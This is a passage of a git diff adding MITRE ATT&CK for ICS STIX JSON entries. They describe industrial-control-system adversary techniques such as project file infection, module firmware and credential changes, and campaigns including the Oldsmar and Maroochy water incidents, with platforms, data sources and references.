"", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0885", + "external_id": "T0885" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722.json new file mode 100644 index 0000000000000000000000000000000000000000..63892c305fa9dfafbb1dfa52893707141ccbc5eb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--6ee95260-55f4-4b07-8f60-f4ad92ab1bb8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T18:58:24.092Z", + "name": "Project File Infection", + "description": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev) \n\nAdversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. (Citation: PLCdev)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0873", + "external_id": "T0873" + }, + { + "source_name": "Beckhoff", + "description": "Beckhoff TwinCAT 3 Source Control: Project Files Retrieved. 2019/11/21 ", + "url": "https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "PLCdev", + "description": "PLCdev Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 Siemens SIMATIC Step 7 Programmer's Handbook Retrieved. 2019/11/21 ", + "url": "http://www.plcdev.com/book/export/html/373" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e.json new file mode 100644 index 0000000000000000000000000000000000000000..bfa965ce2bea25d47762401817694fc6c50d8280 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--9bd0d03d-1e61-4876-83e4-e9e9cca8d0b6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Network Connection Enumeration", + "description": "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Script: Script Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0840", + "external_id": "T0840" + }, + { + "source_name": "MITRE", + "description": "MITRE System Network Connections Discovery Retrieved. 2018/05/31 ", + "url": "https://attack.mitre.org/wiki/Technique/T1049" + }, + { + "source_name": "Netstat", + "description": "Wikipedia. (n.d.). Netstat. Retrieved May 23, 2022.", + "url": "https://en.wikipedia.org/wiki/Netstat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d.json new file mode 100644 index 0000000000000000000000000000000000000000..960854e300da8b2121793ccb47404959c0fe220c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--4e6f52f7-0b94-49c3-acb3-49f8c8220716", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Lateral Tool Transfer", + "description": "Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK)\n\nIn control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Process: Process Creation", + "File: File Creation", + "File: File Metadata", + "Network Share: Network Share Access", + "Network Traffic: Network Traffic Flow", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0867", + "external_id": "T0867" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Enterprise ATT&CK Lateral Tool Transfer Retrieved. 2019/10/27 Lateral Tool Transfer Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1570/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707.json new file mode 100644 index 0000000000000000000000000000000000000000..2845b59379c28d0ace90f1e57e206f7485388a6a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--bd74b813-e55a-4819-adf1-ae7fb3a9260c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Module Firmware", + "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. \n\nThis technique is similar to [System Firmware](https://attack.mitre.org/techniques/T0857), but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. (Citation: Daniel Peck, Dale Peterson January 2009) \n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: (Citation: Daniel Peck, Dale Peterson January 2009) \n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. \n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. \n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. \n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. \n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0839", + "external_id": "T0839" + }, + { + "source_name": "Daniel Peck, Dale Peterson January 2009", + "description": "Daniel Peck, Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19 ", + "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307.json new file mode 100644 index 0000000000000000000000000000000000000000..6c890043d17491ad8c2acbe77fe465dc6176b47c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--2a817bbb-9524-4ceb-8264-0ec302ba9309", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Internet Accessible Device", + "description": "Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique.\n\nAdversaries may leverage built in functions for remote access which may not be protected or utilize minimal legacy protections that may be targeted. (Citation: NCCIC January 2014) These services may be discoverable through the use of online scanning tools. \n\nIn the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing. (Citation: NCCIC January 2014) (Citation: Danny Yadron December 2015) (Citation: Mark Thompson March 2016)\n\nIn Trend Micros manufacturing deception operations adversaries were detected leveraging direct internet access to an ICS environment through the exposure of operational protocols such as Siemens S7, Omron FINS, and EtherNet/IP, in addition to misconfigured VNC access. (Citation: Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0883", + "external_id": "T0883" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "NCCIC January 2014", + "description": "NCCIC 2014, January 1 Internet Accessible Control Systems At Risk Retrieved. 2019/11/07 ", + "url": "https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf" + }, + { + "source_name": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler", + "description": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 Caught in the Act: Running a Realistic Factory Honeypot to Capture Real Threats Retrieved. 2021/04/12 ", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-caught-in-the-act-running-a-realistic-factory-honeypot-to-capture-real-threats.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5.json new file mode 100644 index 0000000000000000000000000000000000000000..dfa90373d98d53bea47209e6bfa0362c065f968e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--63a71c8f-7a45-4400-9ddc-0131361f55d1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T14:14:48.109Z", + "name": "Data from Local System", + "description": "Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes.\n\nAdversaries may do this using [Command-Line Interface](https://attack.mitre.org/techniques/T0807) or [Scripting](https://attack.mitre.org/techniques/T0853) techniques to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T0802) on the local system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Control Server", + "Input/Output Server", + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation", + "Script: Script Execution", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "created": "2023-03-30T18:56:02.424Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0893", + "external_id": "T0893" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f.json new file mode 100644 index 0000000000000000000000000000000000000000..46034449ed3d3739e4089832290c8232c7d6223d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--b2051dfe-26a2-4050-bd67-7aacf6fc8467", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-07T13:40:53.842Z", + "name": "Change Credential", + "description": "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces.\n\nAn adversary with access to valid or hardcoded credentials could change the credential to prevent future authorized device access. Change Credential may be especially damaging when paired with other techniques such as Modify Program, Data Destruction, or Modify Controller Tasking. In these cases, a device\u2019s configuration may be destroyed or include malicious actions for the process environment, which cannot not be removed through normal device configuration actions. \n\nAdditionally, recovery of the device and original configuration may be difficult depending on the features provided by the device. In some cases, these passwords cannot be removed onsite and may require that the device be sent back to the vendor for additional recovery steps.\n\n\nA chain of incidents occurred in Germany, where adversaries locked operators out of their building automation system (BAS) controllers by enabling a previously unset BCU key. (Citation: German BAS Lockout Dec 2021) \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_contributors": [ + "Felix Eberstaller" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "created": "2023-03-30T14:04:17.023Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0892", + "external_id": "T0892" + }, + { + "source_name": "German BAS Lockout Dec 2021", + "description": "Kelly Jackson Higgins. (2021, December 20). Lights Out: Cyberattacks Shut Down Building Automation Systems. Retrieved March 30, 2023.", + "url": "https://www.darkreading.com/attacks-breaches/lights-out-cyberattacks-shut-down-building-automation-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2.json new file mode 100644 index 0000000000000000000000000000000000000000..8a9c0184d66f123e84b1e6efaeb0bba8049ee899 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--01b173fc-5561-440a-8380-62198c50ba45", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Modify Program", + "description": "Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append. \n\nProgram modification encompasses the addition and modification of instructions and logic contained in Program Organization Units (POU) (Citation: IEC February 2013) and similar programming elements found on controllers. This can include, for example, adding new functions to a controller, modifying the logic in existing functions and making new calls from one function to another. \n\nSome programs may allow an adversary to interact directly with the native API of the controller to take advantage of obscure features or vulnerabilities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Asset: Software", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0889", + "external_id": "T0889" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2.json b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2.json new file mode 100644 index 0000000000000000000000000000000000000000..0a34459a61c15410e5b8e5d7b6de3bd568e3fd0f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--56950f2b-d5bb-4ae1-ad11-c4c4c4e088b1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T15:56:01.070Z", + "name": "Oldsmar Treatment Plant Intrusion", + "description": "[Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009) was a cyber incident involving a water treatment facility in Florida. During this incident, unidentified threat actors leveraged features of the system to access and modify setpoints for a specific chemical required in the treatment process. The incident was detected immediately and prevented before it could cause any harm to the public.(Citation: Pinellas County Sheriffs Office February 2021)(Citation: CISA AA21-042A Water Treatment Intrusion Feb 2021)(Citation: Dragos Oldsmar Feb 2021)", + "aliases": [ + "Oldsmar Treatment Plant Intrusion" + ], + "first_seen": "2021-02-01T05:00:00.000Z", + "last_seen": "2021-02-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Pinellas County Sheriffs Office February 2021)", + "x_mitre_last_seen_citation": "(Citation: Pinellas County Sheriffs Office February 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "created": "2022-09-20T20:53:14.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0009", + "external_id": "C0009" + }, + { + "source_name": "CISA AA21-042A Water Treatment Intrusion Feb 2021", + "description": "CISA. (2021, February 11). Compromise of U.S. Water Treatment Facility . Retrieved October 18, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-042a" + }, + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + }, + { + "source_name": "Dragos Oldsmar Feb 2021", + "description": "Serino, G., et al . (2021, February 8). Recommendations Following the Oldsmar Water Treatment Facility Cyber Attack. Retrieved October 21, 2022.", + "url": "https://www.dragos.com/blog/industry-news/recommendations-following-the-oldsmar-water-treatment-facility-cyber-attack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--70cab19e-1745-425e-b3db-c02cd5ff157a.json b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--70cab19e-1745-425e-b3db-c02cd5ff157a.json new file mode 100644 index 0000000000000000000000000000000000000000..05aebc30f4fb402e458c0e7de3eb098ed6092837 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/campaign/campaign--70cab19e-1745-425e-b3db-c02cd5ff157a.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b27263c2-2c44-42e0-a121-3727560f9b61", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T22:00:43.353Z", + "name": "Maroochy Water Breach", + "description": "[Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020) was an incident in 2000 where an adversary leveraged the local government\u2019s wastewater control system and stolen engineering equipment to disrupt and eventually release 800,000 liters of raw sewage into the local community.(Citation: Marshall Abrams July 2008)", + "aliases": [ + "Maroochy Water Breach" + ], + "first_seen": "2000-02-01T05:00:00.000Z", + "last_seen": "2000-04-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Marshall Abrams July 2008)", + "x_mitre_last_seen_citation": 